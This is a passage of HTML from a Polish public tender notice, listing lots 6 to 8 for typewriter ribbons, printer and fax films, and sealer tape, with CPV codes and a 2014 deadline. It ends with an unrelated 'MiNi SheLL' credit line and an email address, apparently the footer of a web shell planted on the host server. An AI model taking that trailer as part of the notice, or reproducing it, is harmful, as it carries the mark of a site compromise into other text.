2. Fabrycznie nowa folia do urządzenia Philips Magic 3 Primo lub równoważny - 6 szt.
3. Fabrycznie nowa folia do urządzenia OKI Microline 521 Elite lub równoważny	- 2 szt.
4. Fabrycznie nowa folia do urządzenia Epson LX-300 lub równoważny - 12 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.20-0, 30.19.23.40-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TAŚMY DO MASZYN DO PISANIA
1. Fabrycznie nowa taśma do urządzenia Quasar SQ 1000 lub równoważny - 12 szt.
2. Fabrycznie nowa taśma do urządzenia Optima SP20 lub równoważny - 60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TAŚMY DO ZGRZEWARKI
Fabrycznie nowa taśma do urządzenia Zgrzewarka rotacyjna HAWO HM 850 DC-V lub równoważny - 6 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com